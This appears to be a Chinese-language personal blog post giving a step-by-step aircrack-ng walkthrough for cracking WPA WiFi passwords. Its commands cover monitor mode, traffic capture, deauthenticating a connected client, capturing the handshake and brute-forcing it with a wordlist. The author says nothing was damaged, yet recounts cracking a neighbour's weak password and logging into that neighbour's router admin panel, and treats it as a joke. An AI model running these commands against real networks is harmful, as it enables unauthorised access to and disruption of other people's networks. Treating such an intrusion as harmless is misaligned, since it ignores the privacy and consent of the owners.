Aircrack
本文最后更新于 408 天前,其中的信息可能已经有所发展或是发生改变。

单纯记录学习,未进行破坏行为,未泄露对方信息

配置 / 工具:

  • Kali Linux live
  • airmon-ng airodump-ng aireplay-ng aircrack-ng
  • USB 外置网卡

攻击对象

  • bssid: XX:XX:XX:XX:XX:XX

开始监听

  • 需要网卡支持 montior
  • 查看本机网卡信息
ifconfig
1
  • 启动监听模式
airmon-ng start wlan0

无线抓包

  • 指定网卡
airodump-ng wlan0 
  • -w <filename> 指定记录的文件主题,将产生下列文件
<filename>-<num>.csv
<filename>-<num>.kismet.csv
<filename>-<num>.kismet.netxml
<filename>-<num>.log.csv
<filename>-<num>.cap
  • 存在过滤器只记录部分抓包信息
Filter options:
    --encrypt   <suite>   : Filter APs by cipher suite
    --netmask <netmask>   : Filter APs by mask
    --bssid     <bssid>   : Filter APs by BSSID
    --essid     <essid>   : Filter APs by ESSID
    --essid-regex <regex> : Filter APs by ESSID using a regular
                            expression
    -a                    : Filter unassociated clients

DeAuth 攻击

  • De-authenticationFlood Attack 通过欺骗从AP到客户端单播地址的取消身份验证帧来将客户端转为未关联/未认证的状态
  • 针对具体路由器下某个客户端进行攻击
aireplay-ng -0 60 -a XX:XX:XX:XX:XX:XX -c OO:OO:OO:OO:OO:OO wlan0

抓获 WPA HandShake

  • 在进行 DeAuth Attack 同时进行监听,通过攻击将用户打掉线之后自动重连捕获连接时的握手包,进行密码爆破(也可以慢慢等有新的用户自行链接)
airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel <num> wlan0

# 须指定信道
  • 当出现 WPA handshake: XX:XX:XX:XX:XX:XX 时证明抓包成功

爆破密码

  • 准备大量字典(github 有很多),指定字典与流量包
aircrack-ng XXX.cap -w XXX.dic
  • 接下来就是运气,很凑巧,隔壁刚好是弱密码弱密码好恐怖
  • 已经拿到密钥了,连上看看,又是很凑巧,路由器用的和我一个牌子,那么直接进入后台了怀疑是我安排的托

总结

千万不要用弱密码!!!
千万不要用弱密码!!!
千万不要用弱密码!!!

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇